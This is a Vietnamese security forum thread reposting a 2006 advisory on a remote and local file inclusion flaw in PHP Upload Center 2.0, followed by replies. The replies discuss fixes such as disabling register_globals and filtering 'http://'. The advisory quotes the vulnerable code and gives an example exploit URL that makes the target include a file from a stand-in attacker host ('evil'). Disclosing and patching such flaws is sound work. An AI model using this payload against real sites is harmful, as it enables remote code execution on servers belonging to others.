banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PHP Upload Center 2.0  XML
  [Announcement]   PHP Upload Center 2.0 06/12/2006 11:27:28 (+0700) | #1 | 28285
[Avatar]
anh_that_tinh
Elite Member

[Minus]    0    [Plus]
Joined: 10/05/2003 04:42:24
Messages: 30
Offline
[Profile] [PM] [Yahoo!]
Code:
*************************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
*************************************************************************************************************************
													  		 
* Name = PHP Upload Center v2.0 ; 											 
													  		 
* Class = Remote/Local File Inclusion ;											 
															 
* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;				 			         
													  		 
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 
												  	  		 
-------------------------------------------------------------------------------------------------------------------------
													  		 
Vulnerable Code in activate.php												 
															 
line 66-70														 
															 
...															 
															 
 if (!isset($language))													 
  $language=$dft_language;												 
if ($language=="")													 
  $language=$dft_language;												 
require("include/${language}.php"); <== Local incl.								 
															 
...															 
	

line 164

...

include($footerpage);  <== Remote incl.

...


Code in include/en.php (and other language files)

line 5-7

...

$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";

...

												  		 
- Ex. :	

  														 
 http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?								 
															 
															 
															 
															 
*************************************************************************************************************************
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 
												          		 
*************************************************************************************************************************

Nguồn : milw0rm.com
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 06/12/2006 11:31:16 (+0700) | #2 | 28287
[Avatar]
binbinbinbin
Member

[Minus]    0    [Plus]
Joined: 21/09/2006 21:45:34
Messages: 53
Location: Trường Nguyễn Chí Thanh-Lớp 11
Offline
[Profile] [PM] [Email] [Yahoo!]
k hiểu gì cả
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 06/12/2006 23:01:23 (+0700) | #3 | 28416
subnetwork
Member

[Minus]    0    [Plus]
Joined: 05/09/2004 06:08:09
Messages: 1666
Offline
[Profile] [PM] [WWW] [Yahoo!]

binbinbinbin wrote:
k hiểu gì cả 

Không hiểu gì cả là không hiểu những gì ?

Những bài viết đại loại như thế này vui lòng đừng gởi lên diễn đàn hoặc get a warning .

Thân
Quản lý máy chủ, cài đặt, tư vấn, thiết kế, bảo mật hệ thống máy chủ dùng *nix
http://chamsocmaychu.com
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 07/12/2006 04:54:31 (+0700) | #4 | 28517
[Avatar]
canh_nguyen
Elite Member

[Minus]    0    [Plus]
Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

binbinbinbin wrote:
k hiểu gì cả 


require("include/${language}.php"); <== Local incl.

include($footerpage); <== Remote incl.

Chú ý đọc kỹ bài nhé bạn.
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 07/12/2006 09:05:14 (+0700) | #5 | 28610
[Avatar]
learn2hack
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 16:32:37
Messages: 825
Offline
[Profile] [PM] [WWW]
Lỗi này có thể sửa bằng cách đặt register_globals=Off trong file cấu hình PHP có phải không ạ?

Nếu không thể can thiệp vào file cấu hình PHP thì làm cách nào có thể khắc phục lỗi này?
Blog: http://hontap.blogspot.com
Tải phần mềm miễn phí: http://www.taiphanmem.org
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 15/12/2006 02:41:23 (+0700) | #6 | 30516
[Avatar]
ngoalong
HVA Friend

Joined: 22/03/2003 04:33:38
Messages: 111
Offline
[Profile] [PM]
Không khoái nghiên cứu mấy cái vụ này lắm nhưng để fix lỗi chắc là phải sửa chút code PHP để khắc phục như lọc http:// trước khi sử dụng biến trong lệnh include($footerpage) mục đích làm cho remote PHP file sẽ không thể nạp và chạy được trên target host.
[Up] [Print Copy]
  [Question]   PHP Upload Center 2.0 01/01/2007 02:53:31 (+0700) | #7 | 33599
phamtienhuong
Member

[Minus]    0    [Plus]
Joined: 20/11/2005 03:10:43
Messages: 11
Offline
[Profile] [PM]
[url=htt://thanhhuongpc.t35.com/fun.gif]
[/url]
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|